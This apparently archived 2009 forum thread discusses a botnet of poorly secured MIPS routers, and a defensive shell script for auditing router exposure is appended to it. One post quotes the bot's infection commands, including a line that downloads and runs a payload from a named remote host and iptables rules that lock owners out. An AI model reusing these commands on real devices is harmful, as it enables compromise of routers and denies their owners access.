Free Republic
General/Chat

To: Swordmaker
While computers running Mac OS X have traditionally benefited from security through obscurity -- the far larger installed base of Windows machines continues to be the most attractive target for malware creators -- that advantage has been eroding because of the popularity of cross-platform software and the rising installed base of Mac OS X devices, among other factors.

OMFG! Do these people not even read industry news? For the past week, there have been all kinds of stories out there about botnets being built with freaking routers. What's the install base of Linksys routers running DD-WRT? I mean come on! When are they going to give up on that 'security by obscurity' canard?

3 posted on 03/28/2009 12:16:01 AM PDT by zeugma (Will it be nukes or aliens? Time will tell.)


To: zeugma
OMFG! Do these people not even read industry news? For the past week, there have been all kinds of stories out there about botnets being built with freaking routers. What's the install base of Linksys routers running DD-WRT? I mean come on! When are they going to give up on that 'security by obscurity' canard?

Yes, you have a good point. I hadn't myself heard about this router bot-net until I saw your post, but I did some research and it appears not only are we talking about a relatively small base of equipment, but the equipment has to be dangerously configured to even be vulnerable:

You are only vulnerable if:
  1. Your device is a mipsel (MIPS running in little-endian mode, this is what the worm is compiled for) device.
  2. Your device also has telnet, SSH or web-based interfaces available to the WAN, and
  3. Your username and password combinations are weak, OR the daemons that your firmware uses are exploitable.

As such, 90% of the routers and modems participating in this botnet are participating due to user-error (the user themselves or otherwise). Unfortunately, it seems that some of the people covering this botnet do not understand this point, and it is making us look like a bunch of idiots.

It does look like more than just DD-WRT routers are targeted; it appears to me that the exploitation method (once they have a root shell on a poorly configured machine) is fairly universal for any mipsel unit running most any Linux-based router code:

Get a shell on the vulnerable device (methods vary). Once a shell is acquired, the bot does the following things:

# rm -f /var/tmp/udhcpc.env
# wget

If wget is present, then it uses wget to download hxxp://dweb.webhop.net/.bb/udhcpc.env , and runs it in the background.

If wget is not present, the bot looks for "busybox ftpget", and then tries falling back to a tftp client. Once it is downloaded, it launches it in the background. The following snippet is the variant it uses if it finds that wget is usable.

# wget hxxp://dweb.webhop.net/.bb/udhcpc.env -P /var/tmp && chmod +x /var/tmp/udhcpc.env && /var/tmp/udhcpc.env &

udhcpc.env 100% |*****************************| 33744 00:00 ETA

It then takes several steps to lock anybody out of the device, including blocking telnet, sshd and web ports.

# iptables -A INPUT -p tcp --dport 23 -j DROP
# iptables -A INPUT -p tcp --dport 22 -j DROP
# iptables -A INPUT -p tcp --dport 80 -j DROP

This concludes the infection process.


4 posted on 03/28/2009 1:17:42 AM PDT by snowsislander (NRA -- join today! 1-877-NRA-2000)
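A quick way to check a router against the first two conditions quoted above, and for the lockout rules the post says the bot installs, is to look at what is listening and what the INPUT chain drops. The script below is an added example; it is not from the DroneBL writeup or from either poster. It takes the text of `netstat -tln` and `iptables -S INPUT` as arguments (the captures embedded here are constructed for demonstration) and reports whether telnet, ssh or the web UI listen on every interface, or whether TCP 23, 22 and 80 are already being dropped the way the post describes.

```sh
#!/bin/sh
# Added audit helper, not from the DroneBL writeup or either post. It checks the
# conditions quoted above against text captured from the router itself:
#   - `netstat -tln`     : which management daemons listen on every interface (WAN included)
#   - `iptables -S INPUT`: whether the lockout rules (DROP tcp/23, 22, 80) are present
# All sample captures below are constructed for demonstration.

# Constructed `netstat -tln` output from a badly configured router: telnet, ssh and the
# web UI are bound to 0.0.0.0, so they are reachable from the WAN side as well.
SAMPLE_NETSTAT='Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:23              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN
tcp        0      0 192.168.1.1:53          0.0.0.0:*               LISTEN'

# Constructed `netstat -tln` output from a sanely configured router: ssh and the web UI
# listen only on the LAN address, and telnet is not running at all.
CLEAN_NETSTAT='Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 192.168.1.1:22          0.0.0.0:*               LISTEN
tcp        0      0 192.168.1.1:80          0.0.0.0:*               LISTEN'

# Constructed `iptables -S INPUT` output after the three iptables commands quoted above.
SAMPLE_IPTABLES='-P INPUT ACCEPT
-A INPUT -i lo -j ACCEPT
-A INPUT -p tcp -m tcp --dport 23 -j DROP
-A INPUT -p tcp -m tcp --dport 22 -j DROP
-A INPUT -p tcp -m tcp --dport 80 -j DROP'

# Print the management ports (23, 22, 80) that listen on every interface, in the order seen.
# $1: netstat -tln text. Binds to 0.0.0.0 or ::: count; binds to one LAN address do not.
exposed_mgmt_ports() {
    printf '%s\n' "$1" | awk '
        $1 == "tcp" && $NF == "LISTEN" {
            n = split($4, a, ":"); port = a[n]
            if ((a[1] == "0.0.0.0" || $4 ~ /^:::/) && (port == 22 || port == 23 || port == 80))
                out = out (out == "" ? "" : " ") port
        }
        END { print out }'
}

# Print the TCP ports that an INPUT rule drops outright, the lockout pattern from the post.
# $1: iptables -S INPUT text.
lockout_rules() {
    printf '%s\n' "$1" | awk '
        $1 == "-A" && $2 == "INPUT" && /-p tcp/ && /-j DROP/ {
            for (i = 1; i < NF; i++)
                if ($i == "--dport") out = out (out == "" ? "" : " ") $(i + 1)
        }
        END { print out }'
}

# One-line verdict. Lockout rules are checked first: once they are in place the daemons
# may still be listening, but the owner has already lost remote access.
router_status() {
    dropped=$(lockout_rules "$2")
    exposed=$(exposed_mgmt_ports "$1")
    if [ -n "$dropped" ]; then
        echo "locked-out: tcp $dropped dropped on INPUT"
    elif [ -n "$exposed" ]; then
        echo "exposed: tcp $exposed listening on all interfaces"
    else
        echo "clean"
    fi
}

router_status "$SAMPLE_NETSTAT" "$SAMPLE_IPTABLES"
router_status "$CLEAN_NETSTAT" "-P INPUT ACCEPT"
```

On a real device you would run `netstat -tln` and `iptables -S INPUT` on the router and pass their output to `router_status`. Two limits worth knowing: a daemon bound to the WAN address itself, rather than 0.0.0.0, is not flagged, and a 0.0.0.0 bind behind a firmware firewall rule that already blocks WAN traffic is reported as "exposed" even though it may not be reachable, so treat that verdict as a prompt to check the filter rules, not as proof. The third condition in the quoted list, weak credentials, cannot be judged from these captures at all.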
